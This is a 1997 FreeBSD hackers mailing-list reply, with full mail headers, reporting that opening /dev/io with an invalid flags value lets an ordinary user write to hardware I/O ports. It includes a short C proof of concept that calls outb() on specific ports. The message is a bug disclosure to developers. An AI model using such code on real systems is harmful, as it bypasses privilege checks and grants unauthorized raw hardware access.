From owner-freebsd-hackers  Thu Oct 23 10:46:15 1997
Return-Path: <owner-freebsd-hackers>
Received: (from root@localhost)
          by hub.freebsd.org (8.8.7/8.8.7) id KAA13664
          for hackers-outgoing; Thu, 23 Oct 1997 10:46:15 -0700 (PDT)
          (envelope-from owner-freebsd-hackers)
Received: from trojanhorse.ml.org (mdean.vip.best.com [206.86.94.101])
          by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id KAA13659
          for <freebsd-hackers@FreeBSD.ORG>; Thu, 23 Oct 1997 10:46:12 -0700 (PDT)
          (envelope-from jamil@trojanhorse.ml.org)
Received: from localhost (jamil@localhost)
	by trojanhorse.ml.org (8.8.7/8.8.5) with SMTP id KAA02954;
	Thu, 23 Oct 1997 10:43:05 -0700 (PDT)
Date: Thu, 23 Oct 1997 10:43:05 -0700 (PDT)
From: "Jamil J. Weatherbee" <jamil@trojanhorse.ml.org>
To: Terry Lambert <tlambert@primenet.com>
cc: thorpej@nas.nasa.gov, joerg_wunsch@uriah.heep.sax.de,
        freebsd-hackers@FreeBSD.ORG
Subject: Re: Possible SERIOUS bug in open()? (Holy Shit!!!)
In-Reply-To: <199710231724.KAA25749@usr02.primenet.com>
Message-ID: <Pine.BSF.3.96.971023104116.2942B-100000@trojanhorse.ml.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk


> Hold a reference instance, but don't let your children have access
> to read or write the device (ie: things like /dev/io).

Wrong! The following code allows the regular joe blow user to read and
write to any port on the machine: (This is really bad)

I've verified that outb() is actually writing.


#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <machine/cpufunc.h>

int
main(int argc, char **argv)
{
  int fd;
  
  fd = open("/dev/io", -1, 0);

  if (fd < 0)
    err(1, "open");
  
  outb (0x253,0x80);
  outb (0x250,0xAA);

}